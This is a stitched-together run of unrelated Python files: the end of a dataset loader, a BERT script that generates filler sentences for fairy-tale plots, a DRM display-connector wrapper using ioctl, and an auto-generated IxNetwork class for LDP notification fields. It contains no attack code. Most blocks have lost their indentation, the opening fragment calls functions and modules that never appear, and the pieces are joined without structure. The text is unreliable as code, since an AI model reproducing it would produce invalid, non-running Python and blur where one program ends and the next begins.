return train_x, train_y, validation_x, validation_y
if __name__ == '__main__':
train_x, train_y, validation_x, validation_y = load_dataset()
print(train_x.shape, train_y.shape, validation_x.shape, validation_y.shape)
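
# Small illustrative check (toy array) of min_max_x above: every column is scaled
# to [0, 1], and a constant column is shifted to start at 0 instead.
if __name__ == '__main__':
    demo = np.array([[1.0, 5.0], [3.0, 5.0]])
    print(min_max_x(demo))  # expected: [[0. 0.] [1. 0.]]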
|
from pytorch_transformers import BertTokenizer, BertForMaskedLM
import torch
import random
import numpy as np
import nltk
import argparse
import string
torch.manual_seed(0)
np.random.seed(0)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
random.seed(0)
parser = argparse.ArgumentParser()
parser.add_argument('--file', type=str, default='../PlotExtraction/fairy.txt')
parser.add_argument('--outfile', type=str, default='bert_fairy.txt')
parser.add_argument('--model', type=str, default='./bert/fairy')
args = parser.parse_args()
tokenizer = BertTokenizer.from_pretrained(args.model)
model = BertForMaskedLM.from_pretrained(args.model, output_attentions=False)
model.eval()
def capitalizeFirst(phrase):
words = phrase.split()
words[0] = words[0].capitalize()
return ' '.join(words)
def is_punctuation(s):
return len(set(s).intersection(set(string.punctuation))) > 0
def getScore(sentence):
tokenized_text = tokenizer.tokenize('[CLS] ' + "[MASK] " + sentence + ' [SEP]')
mask_idxs = duplicates(tokenized_text, "[MASK]")
if decoding_type == 'right to left':
focus_mask_idx = max(mask_idxs)
else:
focus_mask_idx = random.choice(mask_idxs)
mask_idxs.pop(mask_idxs.index(focus_mask_idx))
temp_tokenized_text = tokenized_text.copy()
temp_tokenized_text = [j for i, j in enumerate(temp_tokenized_text) if i not in mask_idxs]
temp_indexed_tokens = tokenizer.convert_tokens_to_ids(temp_tokenized_text)
ff = [idx for idx, i in enumerate(temp_indexed_tokens) if i == 103]
temp_segments_ids = [0] * len(temp_tokenized_text)
tokens_tensor = torch.tensor([temp_indexed_tokens])
segments_tensors = torch.tensor([temp_segments_ids])
with torch.no_grad():
outputs = model(tokens_tensor, token_type_ids=segments_tensors)
predictions = outputs[0]
# get score of punctuation and compare to predicted score
end_score = predictions[0, ff][0, tokenizer.convert_tokens_to_ids('.')]
return end_score
def duplicates(lst, item):
return [i for i, x in enumerate(lst) if x == item]
file = open(args.file, 'r')
output = open(args.outfile, 'w')
for line in file:
parsed = line.split('\t')
character = parsed[0]
story = parsed[1:]
out = []
for i in range(len(story) - 1):
prev = story[i] + '.'
next = story[i + 1] + '.'
sentences = []
for sentence_count in range(3):
length = random.randint(3, 5)
generated = '.'
            # use a separate loop variable so the outer story index `i` is not shadowed
            for step in range(length):
                decoding_type = 'right to left'
                tmp = character + ' ' + "[MASK] " * (length - step) + generated
fill = ' '.join(['[CLS]', prev, tmp, next, '[SEP]'])
# print(fill)
tokenized_text = tokenizer.tokenize(fill)
mask_idxs = duplicates(tokenized_text, "[MASK]")
if decoding_type == 'right to left':
focus_mask_idx = max(mask_idxs)
else:
focus_mask_idx = random.choice(mask_idxs)
mask_idxs.pop(mask_idxs.index(focus_mask_idx))
temp_tokenized_text = tokenized_text.copy()
temp_tokenized_text = [j for i, j in enumerate(temp_tokenized_text) if i not in mask_idxs]
temp_indexed_tokens = tokenizer.convert_tokens_to_ids(temp_tokenized_text)
ff = [idx for idx, i in enumerate(temp_indexed_tokens) if i == 103]
temp_segments_ids = [0] * len(temp_tokenized_text)
tokens_tensor = torch.tensor([temp_indexed_tokens])
segments_tensors = torch.tensor([temp_segments_ids])
with torch.no_grad():
outputs = model(tokens_tensor, token_type_ids=segments_tensors)
predictions = outputs[0]
k = 20
predicted_token = '.'
while is_punctuation(predicted_token):
predicted_index = random.choice(predictions[0, ff].argsort()[0][-k:]).item()
predicted_score = predictions[0, ff][0, predicted_index]
predicted_token = tokenizer.convert_ids_to_tokens([predicted_index])[0]
tokenized_text[focus_mask_idx] = predicted_token
# get score of punctuation and compare to predicted score
# end_score = getScore(character + ' ' + predicted_token + ' ' + generated + ' ' + sentence)
# print(end_score)
# if end_score > 5:
# break
if generated != '.':
generated = ' ' + generated
generated = predicted_token + generated
final = capitalizeFirst(character) + ' ' + generated
next = final + ' ' + next
print(final)
sentences.append(final)
out.append(' '.join(sentences))
print(len(out), len(story))
for i in range(len(story) - 1):
output.write(story[i] + '. ' + out[i] + ' ')
output.write(story[-1] + '.')
output.write('\n')
|
import fcntl
import ctypes
from .base import DrmObject, DrmMode
from .drm_h import DRM_IOCTL_MODE_GETCONNECTOR
from .drm_mode_h import DrmModeGetConnectorC, DrmModeModeinfoC, drm_connector_type_id_name, DRM_MODE_OBJECT_CONNECTOR
# ("encoders_ptr", c_uint64),
# ("modes_ptr", c_uint64),
# ("props_ptr", c_uint64),
# ("prop_values_ptr", c_uint64),
#
# ("count_modes", c_uint32),
# ("count_props", c_uint32),
# ("count_encoders", c_uint32),
#
# ("encoder_id", c_uint32),
# ("connector_id", c_uint32),
# ("connector_type", c_uint32),
# ("connector_type_id", c_uint32),
#
# ("connection", c_uint32),
# ("mm_width", c_uint32),
# ("mm_height", c_uint32),
# ("subpixel", c_uint32),
class DrmConnector(DrmObject):
def __init__(self, drm, id):
self._drm = drm
self.id = int(id)
self._encoders = []
self.fetch()
def fetch(self):
arg = DrmModeGetConnectorC()
arg.connector_id = self.id
fcntl.ioctl(self._drm.fd, DRM_IOCTL_MODE_GETCONNECTOR, arg)
encoder_ids = (ctypes.c_uint32*arg.count_encoders)()
arg.encoders_ptr = ctypes.cast(ctypes.pointer(encoder_ids), ctypes.c_void_p).value
modes_c = (DrmModeModeinfoC*arg.count_modes)()
arg.modes_ptr = ctypes.cast(ctypes.pointer(modes_c), ctypes.c_void_p).value
# Use get_props() instead
arg.count_props = 0
fcntl.ioctl(self._drm.fd, DRM_IOCTL_MODE_GETCONNECTOR, arg)
self._arg = arg
self.type = arg.connector_type
self.type_id = arg.connector_type_id
self.status = arg.connection
self.mm_width = arg.mm_width
self.mm_height = arg.mm_height
self.subpixel = arg.subpixel
for i in range(arg.count_encoders):
self._encoders.append(self._drm.get_encoder(encoder_ids[i]))
        if arg.encoder_id:
self.encoder = self._drm.get_encoder(arg.encoder_id)
else:
self.encoder = None
self.modes = [DrmMode(modes_c[i]) for i in range(arg.count_modes)]
self.name = "%s-%s" %(drm_connector_type_id_name(self.type), self.type_id)
self.get_props(DRM_MODE_OBJECT_CONNECTOR)
@property
def encoders(self):
return list(self._encoders)
@property
def preferred_mode(self):
for mode in self.modes:
if mode.preferred:
return mode
return None
def find_mode(self, modestr=None, vrefresh=None):
#print "find_modes(%s,%s)\n" % (modestr, vrefresh)
mode = None
if modestr:
for m in self.modes:
if m.name == modestr:
if vrefresh is None or m.vrefresh == vrefresh:
mode = m
break
else:
mode = self.preferred_mode
return mode
|
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class LdpNotification(Base):
__slots__ = ()
_SDM_NAME = 'ldpNotification'
_SDM_ATT_MAP = {
'HeaderVersion': 'ldpNotification.header.version-1',
'HeaderPduLengthinOctets': 'ldpNotification.header.pduLengthinOctets-2',
'HeaderLsrID': 'ldpNotification.header.lsrID-3',
'HeaderLabelSpace': 'ldpNotification.header.labelSpace-4',
'HeaderUBit': 'ldpNotification.header.uBit-5',
'HeaderType': 'ldpNotification.header.type-6',
'HeaderLength': 'ldpNotification.header.length-7',
'HeaderMessageID': 'ldpNotification.header.messageID-8',
'StatusTLVUBit': 'ldpNotification.header.statusTLV.uBit-9',
'StatusTLVFBit': 'ldpNotification.header.statusTLV.fBit-10',
'StatusTLVType': 'ldpNotification.header.statusTLV.type-11',
'StatusTLVLength': 'ldpNotification.header.statusTLV.length-12',
'SuccessEBit': 'ldpNotification.header.statusTLV.statusCode.success.eBit-13',
'SuccessFBit': 'ldpNotification.header.statusTLV.statusCode.success.fBit-14',
'SuccessStatusData': 'ldpNotification.header.statusTLV.statusCode.success.statusData-15',
'BadLDPIdentifierEBit': 'ldpNotification.header.statusTLV.statusCode.badLDPIdentifier.eBit-16',
'BadLDPIdentifierFBit': 'ldpNotification.header.statusTLV.statusCode.badLDPIdentifier.fBit-17',
'BadLDPIdentifierStatusData': 'ldpNotification.header.statusTLV.statusCode.badLDPIdentifier.statusData-18',
'BadProtocolVersionEBit': 'ldpNotification.header.statusTLV.statusCode.badProtocolVersion.eBit-19',
'BadProtocolVersionFBit': 'ldpNotification.header.statusTLV.statusCode.badProtocolVersion.fBit-20',
'BadProtocolVersionStatusData': 'ldpNotification.header.statusTLV.statusCode.badProtocolVersion.statusData-21',
'BadPDULengthEBit': 'ldpNotification.header.statusTLV.statusCode.badPDULength.eBit-22',
'BadPDULengthFBit': 'ldpNotification.header.statusTLV.statusCode.badPDULength.fBit-23',
'BadPDULengthStatusData': 'ldpNotification.header.statusTLV.statusCode.badPDULength.statusData-24',
'UnknownMessageTypeEBit': 'ldpNotification.header.statusTLV.statusCode.unknownMessageType.eBit-25',
'UnknownMessageTypeFBit': 'ldpNotification.header.statusTLV.statusCode.unknownMessageType.fBit-26',
'UnknownMessageTypeStatusData': 'ldpNotification.header.statusTLV.statusCode.unknownMessageType.statusData-27',
'BadMessageLengthEBit': 'ldpNotification.header.statusTLV.statusCode.badMessageLength.eBit-28',
'BadMessageLengthFBit': 'ldpNotification.header.statusTLV.statusCode.badMessageLength.fBit-29',
'BadMessageLengthStatusData': 'ldpNotification.header.statusTLV.statusCode.badMessageLength.statusData-30',
'UnknownTLVEBit': 'ldpNotification.header.statusTLV.statusCode.unknownTLV.eBit-31',
'UnknownTLVFBit': 'ldpNotification.header.statusTLV.statusCode.unknownTLV.fBit-32',
'UnknownTLVStatusData': 'ldpNotification.header.statusTLV.statusCode.unknownTLV.statusData-33',
'BadTLVLengthEBit': 'ldpNotification.header.statusTLV.statusCode.badTLVLength.eBit-34',
'BadTLVLengthFBit': 'ldpNotification.header.statusTLV.statusCode.badTLVLength.fBit-35',
'BadTLVLengthStatusData': 'ldpNotification.header.statusTLV.statusCode.badTLVLength.statusData-36',
'MalformedTLVValueEBit': 'ldpNotification.header.statusTLV.statusCode.malformedTLVValue.eBit-37',
'MalformedTLVValueFBit': 'ldpNotification.header.statusTLV.statusCode.malformedTLVValue.fBit-38',
'MalformedTLVValueStatusData': 'ldpNotification.header.statusTLV.statusCode.malformedTLVValue.statusData-39',
'HoldTimerExpiredEBit': 'ldpNotification.header.statusTLV.statusCode.holdTimerExpired.eBit-40',
'HoldTimerExpiredFBit': 'ldpNotification.header.statusTLV.statusCode.holdTimerExpired.fBit-41',
'HoldTimerExpiredStatusData': 'ldpNotification.header.statusTLV.statusCode.holdTimerExpired.statusData-42',
'ShutdownEBit': 'ldpNotification.header.statusTLV.statusCode.shutdown.eBit-43',
'ShutdownFBit': 'ldpNotification.header.statusTLV.statusCode.shutdown.fBit-44',
'ShutdownStatusData': 'ldpNotification.header.statusTLV.statusCode.shutdown.statusData-45',
'LoopDetectedEBit': 'ldpNotification.header.statusTLV.statusCode.loopDetected.eBit-46',
'LoopDetectedFBit': 'ldpNotification.header.statusTLV.statusCode.loopDetected.fBit-47',
'LoopDetectedStatusData': 'ldpNotification.header.statusTLV.statusCode.loopDetected.statusData-48',
'UnknownFECEBit': 'ldpNotification.header.statusTLV.statusCode.unknownFEC.eBit-49',
'UnknownFECFBit': 'ldpNotification.header.statusTLV.statusCode.unknownFEC.fBit-50',
'UnknownFECStatusData': 'ldpNotification.header.statusTLV.statusCode.unknownFEC.statusData-51',
'NoRouteEBit': 'ldpNotification.header.statusTLV.statusCode.noRoute.eBit-52',
'NoRouteFBit': 'ldpNotification.header.statusTLV.statusCode.noRoute.fBit-53',
'NoRouteStatusData': 'ldpNotification.header.statusTLV.statusCode.noRoute.statusData-54',
'NoLabelResourcesEBit': 'ldpNotification.header.statusTLV.statusCode.noLabelResources.eBit-55',
'NoLabelResourcesFBit': 'ldpNotification.header.statusTLV.statusCode.noLabelResources.fBit-56',
'NoLabelResourcesStatusData': 'ldpNotification.header.statusTLV.statusCode.noLabelResources.statusData-57',
'LabelResourcesAvailableEBit': 'ldpNotification.header.statusTLV.statusCode.labelResourcesAvailable.eBit-58',
'LabelResourcesAvailableFBit': 'ldpNotification.header.statusTLV.statusCode.labelResourcesAvailable.fBit-59',
'LabelResourcesAvailableStatusData': 'ldpNotification.header.statusTLV.statusCode.labelResourcesAvailable.statusData-60',
'SessionRejectedNoHelloEBit': 'ldpNotification.header.statusTLV.statusCode.sessionRejectedNoHello.eBit-61',
'SessionRejectedNoHelloFBit': 'ldpNotification.header.statusTLV.statusCode.sessionRejectedNoHello.fBit-62',
'SessionRejectedNoHelloStatusData': 'ldpNotification.header.statusTLV.statusCode.sessionRejectedNoHello.statusData-63',
'SessionRejectedAdvertisementModeEBit': 'ldpNotification.header.statusTLV.statusCode.sessionRejectedAdvertisementMode.eBit-64',
'SessionRejectedAdvertisementModeFBit': 'ldpNotification.header.statusTLV.statusCode.sessionRejectedAdvertisementMode.fBit-65',
'SessionRejectedAdvertisementModeStatusData': 'ldpNotification.header.statusTLV.statusCode.sessionRejectedAdvertisementMode.statusData-66',
'SessionRejectedMaxPDULengthEBit': 'ldpNotification.header.statusTLV.statusCode.sessionRejectedMaxPDULength.eBit-67',
'SessionRejectedMaxPDULengthFBit': 'ldpNotification.header.statusTLV.statusCode.sessionRejectedMaxPDULength.fBit-68',
'SessionRejectedMaxPDULengthStatusData': 'ldpNotification.header.statusTLV.statusCode.sessionRejectedMaxPDULength.statusData-69',
'SessionRejectedLabelRangeEBit': 'ldpNotification.header.statusTLV.statusCode.sessionRejectedLabelRange.eBit-70',
'SessionRejectedLabelRangeFBit': 'ldpNotification.header.statusTLV.statusCode.sessionRejectedLabelRange.fBit-71',
'SessionRejectedLabelRangeStatusData': 'ldpNotification.header.statusTLV.statusCode.sessionRejectedLabelRange.statusData-72',
'KeepaliveTimerExiredEBit': 'ldpNotification.header.statusTLV.statusCode.keepaliveTimerExired.eBit-73',
'KeepaliveTimerExiredFBit': 'ldpNotification.header.statusTLV.statusCode.keepaliveTimerExired.fBit-74',
'KeepaliveTimerExiredStatusData': 'ldpNotification.header.statusTLV.statusCode.keepaliveTimerExired.statusData-75',
'LabelRequestAbortedEBit': 'ldpNotification.header.statusTLV.statusCode.labelRequestAborted.eBit-76',
'LabelRequestAbortedFBit': 'ldpNotification.header.statusTLV.statusCode.labelRequestAborted.fBit-77',
'LabelRequestAbortedStatusData': 'ldpNotification.header.statusTLV.statusCode.labelRequestAborted.statusData-78',
'MissingMessageParametersEBit': 'ldpNotification.header.statusTLV.statusCode.missingMessageParameters.eBit-79',
'MissingMessageParametersFBit': 'ldpNotification.header.statusTLV.statusCode.missingMessageParameters.fBit-80',
'MissingMessageParametersStatusData': 'ldpNotification.header.statusTLV.statusCode.missingMessageParameters.statusData-81',
'UnsupportedAddressFamilyEBit': 'ldpNotification.header.statusTLV.statusCode.unsupportedAddressFamily.eBit-82',
'UnsupportedAddressFamilyFBit': 'ldpNotification.header.statusTLV.statusCode.unsupportedAddressFamily.fBit-83',
'UnsupportedAddressFamilyStatusData': 'ldpNotification.header.statusTLV.statusCode.unsupportedAddressFamily.statusData-84',
'SessionRejectedBadKeepaliveTimeEBit': 'ldpNotification.header.statusTLV.statusCode.sessionRejectedBadKeepaliveTime.eBit-85',
'SessionRejectedBadKeepaliveTimeFBit': 'ldpNotification.header.statusTLV.statusCode.sessionRejectedBadKeepaliveTime.fBit-86',
'SessionRejectedBadKeepaliveTimeStatusData': 'ldpNotification.header.statusTLV.statusCode.sessionRejectedBadKeepaliveTime.statusData-87',
'InternalErrorEBit': 'ldpNotification.header.statusTLV.statusCode.internalError.eBit-88',
'InternalErrorFBit': 'ldpNotification.header.statusTLV.statusCode.internalError.fBit-89',
'InternalErrorStatusData': 'ldpNotification.header.statusTLV.statusCode.internalError.statusData-90',
'StatusTLVMessageID': 'ldpNotification.header.statusTLV.messageID-91',
'StatusTLVMessageType': 'ldpNotification.header.statusTLV.messageType-92',
'TclLDPMpStatusTLVUBit': 'ldpNotification.header.tclLDPMpStatusTLV.uBit-93',
'TclLDPMpStatusTLVFBit': 'ldpNotification.header.tclLDPMpStatusTLV.fBit-94',
'TclLDPMpStatusTLVTclType': 'ldpNotification.header.tclLDPMpStatusTLV.tclType-95',
'TclLDPMpStatusTLVTclLength': 'ldpNotification.header.tclLDPMpStatusTLV.tclLength-96',
'TclCustomTypeTclType': 'ldpNotification.header.tclLDPMpStatusTLV.tclLDPMPStatusValueElements.selectTLVType.tclCustomType.tclType-97',
'TclCustomTypeTclLength': 'ldpNotification.header.tclLDPMpStatusTLV.tclLDPMPStatusValueElements.selectTLVType.tclCustomType.tclLength-98',
'TclCustomTypeTclValue': 'ldpNotification.header.tclLDPMpStatusTLV.tclLDPMPStatusValueElements.selectTLVType.tclCustomType.tclValue-99',
'FecTLVUBit': 'ldpNotification.header.fecTLV.uBit-100',
'FecTLVFBit': 'ldpNotification.header.fecTLV.fBit-101',
'FecTLVType': 'ldpNotification.header.fecTLV.type-102',
'FecTLVLength': 'ldpNotification.header.fecTLV.length-103',
'TclP2mpTclType': 'ldpNotification.header.fecTLV.fecElement.tclP2mp.tclType-104',
'TclIpv4P2mpAddressTclP2mpAddressFamily': 'ldpNotification.header.fecTLV.fecElement.tclP2mp.tclAddressFamily.tclIpv4P2mpAddress.tclP2mpAddressFamily-105',
'TclIpv4P2mpAddressTclP2mpAddressLength': 'ldpNotification.header.fecTLV.fecElement.tclP2mp.tclAddressFamily.tclIpv4P2mpAddress.tclP2mpAddressLength-106',
'TclIpv4P2mpAddressTclRootAddress': 'ldpNotification.header.fecTLV.fecElement.tclP2mp.tclAddressFamily.tclIpv4P2mpAddress.tclRootAddress-107',
'TclIpv6P2mpAddressTclP2mpIpv6AddressFamily': 'ldpNotification.header.fecTLV.fecElement.tclP2mp.tclAddressFamily.tclIpv6P2mpAddress.tclP2mpIpv6AddressFamily-108',
'TclIpv6P2mpAddressTclP2mpIpv6AddressLength': 'ldpNotification.header.fecTLV.fecElement.tclP2mp.tclAddressFamily.tclIpv6P2mpAddress.tclP2mpIpv6AddressLength-109',
'TclIpv6P2mpAddressTclIpv6RootAddress': 'ldpNotification.header.fecTLV.fecElement.tclP2mp.tclAddressFamily.tclIpv6P2mpAddress.tclIpv6RootAddress-110',
'TclP2mpTclOpaqueLength': 'ldpNotification.header.fecTLV.fecElement.tclP2mp.tclOpaqueLength-111',
'TclGenericLSPIdentifierTLVTclType': 'ldpNotification.header.fecTLV.fecElement.tclP2mp.tclOpaqueTlvs.selectTLVType.tclGenericLSPIdentifierTLV.tclType-112',
'TclGenericLSPIdentifierTLVTclLength': 'ldpNotification.header.fecTLV.fecElement.tclP2mp.tclOpaqueTlvs.selectTLVType.tclGenericLSPIdentifierTLV.tclLength-113',
'TclGenericLSPIdentifierTLVTclValue': 'ldpNotification.header.fecTLV.fecElement.tclP2mp.tclOpaqueTlvs.selectTLVType.tclGenericLSPIdentifierTLV.tclValue-114',
'TclEditTLVTclType': 'ldpNotification.header.fecTLV.fecElement.tclP2mp.tclOpaqueTlvs.selectTLVType.tclEditTLV.tclType-115',
'TclEditTLVTclLength': 'ldpNotification.header.fecTLV.fecElement.tclP2mp.tclOpaqueTlvs.selectTLVType.tclEditTLV.tclLength-116',
'TclEditTLVTclValue': 'ldpNotification.header.fecTLV.fecElement.tclP2mp.tclOpaqueTlvs.selectTLVType.tclEditTLV.tclValue-117',
'TclP2mpTypedWcardTclTypeTypedWcard': 'ldpNotification.header.fecTLV.fecElement.tclP2mpTypedWcard.tclTypeTypedWcard-118',
'TclP2mpTypedWcardTclTypeWcard': 'ldpNotification.header.fecTLV.fecElement.tclP2mpTypedWcard.tclTypeWcard-119',
'TclP2mpTypedWcardTclTypeLen': 'ldpNotification.header.fecTLV.fecElement.tclP2mpTypedWcard.tclTypeLen-120',
'TclP2mpTypedWcardTclTypeAfi': 'ldpNotification.header.fecTLV.fecElement.tclP2mpTypedWcard.tclTypeAfi-121',
'GenericLabelTLVUBit': 'ldpNotification.header.labelTLV.genericLabelTLV.uBit-122',
'GenericLabelTLVFBit': 'ldpNotification.header.labelTLV.genericLabelTLV.fBit-123',
'GenericLabelTLVType': 'ldpNotification.header.labelTLV.genericLabelTLV.type-124',
'GenericLabelTLVLength': 'ldpNotification.header.labelTLV.genericLabelTLV.length-125',
'GenericLabelTLVLabel': 'ldpNotification.header.labelTLV.genericLabelTLV.label-126',
'AtmLabelTLVUBit': 'ldpNotification.header.labelTLV.atmLabelTLV.uBit-127',
'AtmLabelTLVFBit': 'ldpNotification.header.labelTLV.atmLabelTLV.fBit-128',
'AtmLabelTLVType': 'ldpNotification.header.labelTLV.atmLabelTLV.type-129',
'AtmLabelTLVLength': 'ldpNotification.header.labelTLV.atmLabelTLV.length-130',
'AtmLabelTLVReserved': 'ldpNotification.header.labelTLV.atmLabelTLV.reserved-131',
'AtmLabelTLVVBits': 'ldpNotification.header.labelTLV.atmLabelTLV.vBits-132',
'AtmLabelTLVVpi': 'ldpNotification.header.labelTLV.atmLabelTLV.vpi-133',
'AtmLabelTLVVci': 'ldpNotification.header.labelTLV.atmLabelTLV.vci-134',
'FrameRelayLabelTLVUBit': 'ldpNotification.header.labelTLV.frameRelayLabelTLV.uBit-135',
'FrameRelayLabelTLVFBit': 'ldpNotification.header.labelTLV.frameRelayLabelTLV.fBit-136',
'FrameRelayLabelTLVType': 'ldpNotification.header.labelTLV.frameRelayLabelTLV.type-137',
'FrameRelayLabelTLVLength': 'ldpNotification.header.labelTLV.frameRelayLabelTLV.length-138',
'FrameRelayLabelTLVReserved': 'ldpNotification.header.labelTLV.frameRelayLabelTLV.reserved-139',
'FrameRelayLabelTLVDlciLength': 'ldpNotification.header.labelTLV.frameRelayLabelTLV.dlciLength-140',
'FrameRelayLabelTLVDlci': 'ldpNotification.header.labelTLV.frameRelayLabelTLV.dlci-141',
'ExtendedStatusTLVUBit': 'ldpNotification.header.optionalParameter.extendedStatusTLV.uBit-142',
'ExtendedStatusTLVFBit': 'ldpNotification.header.optionalParameter.extendedStatusTLV.fBit-143',
'ExtendedStatusTLVType': 'ldpNotification.header.optionalParameter.extendedStatusTLV.type-144',
'ExtendedStatusTLVLength': 'ldpNotification.header.optionalParameter.extendedStatusTLV.length-145',
'ExtendedStatusTLVCode': 'ldpNotification.header.optionalParameter.extendedStatusTLV.code-146',
'ReturnedPDUTLVUBit': 'ldpNotification.header.optionalParameter.returnedPDUTLV.uBit-147',
'ReturnedPDUTLVFBit': 'ldpNotification.header.optionalParameter.returnedPDUTLV.fBit-148',
'ReturnedPDUTLVType': 'ldpNotification.header.optionalParameter.returnedPDUTLV.type-149',
'ReturnedPDUTLVLength': 'ldpNotification.header.optionalParameter.returnedPDUTLV.length-150',
'ReturnedMessageTLVUBit': 'ldpNotification.header.optionalParameter.returnedMessageTLV.uBit-151',
'ReturnedMessageTLVFBit': 'ldpNotification.header.optionalParameter.returnedMessageTLV.fBit-152',
'ReturnedMessageTLVType': 'ldpNotification.header.optionalParameter.returnedMessageTLV.type-153',
'ReturnedMessageTLVLength': 'ldpNotification.header.optionalParameter.returnedMessageTLV.length-154',
'ExtendedStatusTLVUBit': 'ldpNotification.header.optionalParameter.extendedStatusTLV.uBit-155',
'ExtendedStatusTLVFBit': 'ldpNotification.header.optionalParameter.extendedStatusTLV.fBit-156',
'ExtendedStatusTLVType': 'ldpNotification.header.optionalParameter.extendedStatusTLV.type-157',
'ExtendedStatusTLVLength': 'ldpNotification.header.optionalParameter.extendedStatusTLV.length-158',
'ExtendedStatusTLVCode': 'ldpNotification.header.optionalParameter.extendedStatusTLV.code-159',
}
def __init__(self, parent, list_op=False):
super(LdpNotification, self).__init__(parent, list_op)
@property
def HeaderVersion(self):
"""
Display Name: Version
Default Value: 1
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderVersion']))
@property
def HeaderPduLengthinOctets(self):
"""
Display Name: PDU length(in octets)
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderPduLengthinOctets']))
@property
def HeaderLsrID(self):
"""
Display Name: LSR ID
Default Value: 0.0.0.0
Value Format: iPv4
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderLsrID']))
@property
def HeaderLabelSpace(self):
"""
Display Name: Label space
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderLabelSpace']))
@property
def HeaderUBit(self):
"""
Display Name: U bit
Default Value: 0
Value Format: decimal
Available enum values: Ignore entire message if unknown TLV, 0, Ignore only unknown TLV, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderUBit']))
@property
def HeaderType(self):
"""
Display Name: Type
Default Value: 0x0001
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderType']))
@property
def HeaderLength(self):
"""
Display Name: Length
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderLength']))
@property
def HeaderMessageID(self):
"""
Display Name: Message ID
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderMessageID']))
@property
def StatusTLVUBit(self):
"""
Display Name: U bit
Default Value: 0
Value Format: decimal
Available enum values: Ignore entire message if unknown TLV, 0, Ignore only unknown TLV, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['StatusTLVUBit']))
@property
def StatusTLVFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['StatusTLVFBit']))
@property
def StatusTLVType(self):
"""
Display Name: Type
Default Value: 0x0300
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['StatusTLVType']))
@property
def StatusTLVLength(self):
"""
Display Name: Length
Default Value: 10
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['StatusTLVLength']))
@property
def SuccessEBit(self):
"""
Display Name: E bit
Default Value: 0
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SuccessEBit']))
@property
def SuccessFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SuccessFBit']))
@property
def SuccessStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000000
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SuccessStatusData']))
@property
def BadLDPIdentifierEBit(self):
"""
Display Name: E bit
Default Value: 1
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BadLDPIdentifierEBit']))
@property
def BadLDPIdentifierFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BadLDPIdentifierFBit']))
@property
def BadLDPIdentifierStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000001
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BadLDPIdentifierStatusData']))
@property
def BadProtocolVersionEBit(self):
"""
Display Name: E bit
Default Value: 1
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BadProtocolVersionEBit']))
@property
def BadProtocolVersionFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BadProtocolVersionFBit']))
@property
def BadProtocolVersionStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000002
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BadProtocolVersionStatusData']))
@property
def BadPDULengthEBit(self):
"""
Display Name: E bit
Default Value: 1
Value Format: decimal
Available enum values: Advisory notification, 0, Fatal error, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BadPDULengthEBit']))
@property
def BadPDULengthFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: Do not forward, 0, Forward, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BadPDULengthFBit']))
@property
def BadPDULengthStatusData(self):
"""
Display Name: Status data
Default Value: 0x0000003
Value Format: hex
"""
